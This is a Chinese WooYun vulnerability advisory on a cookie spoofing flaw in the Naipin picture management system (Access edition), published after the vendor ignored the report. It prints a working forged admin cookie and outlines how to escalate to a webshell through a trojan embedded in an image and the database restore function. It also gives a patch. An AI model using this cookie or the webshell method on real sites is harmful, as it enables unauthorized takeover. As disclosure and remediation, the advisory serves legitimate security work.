漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2010-0695
漏洞标题: 耐品图片管理系统Access版有Cookie欺骗漏洞
相关厂商:深圳耐品科技
漏洞作者: 路人甲
提交时间:2010-10-14 18:57
修复时间:2010-10-15 10:55
公开时间:2010-10-15 10:55
漏洞类型:非授权访问/权限绕过
危害等级:中
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2010-10-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-10-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
耐品图片管理系统Access版有Cookie欺骗漏洞,可不登录拿到后台管理权限,进一步提权得webshell
详细说明:
大概一年前我发现了《耐品图片管理系统Access版》有Cookie欺骗漏洞:
任意用户可以通过修改Cookie拿到管理员权限。
今年6月份我给耐品技术发了邮件,告知了这个漏洞,他们回复如下:
”您好,谢谢您的提醒!
祝您合家幸福安康!“
今天我下载了最新版(Naipin_T_20100906_acc.rar)进行了测试,发现这个漏洞仍然存在。
既然官方如此不重视,我就它放出来。
演示视频下载地址:http://www.redicecn.com/attachments2008@see/month_201010/naipin_bug.7z
Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL
利用上面的cookie不登录也能拿到管理员权限...
拿Webshell的一种思路:
如果数据库后缀名是asp的,可以采用该思路。上传用户图像,上传一张含有一句话木马的图片(采用edjpgcom工具)。
进入后台,使用数据库恢复功能将上传的图片恢复为数据库。
看演示。
over 谢谢
漏洞证明:
Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL
利用上面的cookie不登录也能拿到管理员权限...
修复方案:
临时修补办法如下:
(1)Admin_ChkLogin.asp第66行下增加如下代码:
session("GroupId")=Rs("GroupId")
(2)将clsMain.asp的第112行改为如下代码:
UserGroupId=session("GroupID")
(3)建议尽量做到:能写入的目录不给执行权限,能执行的目录不给写入权限。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:10 (WooYun评价)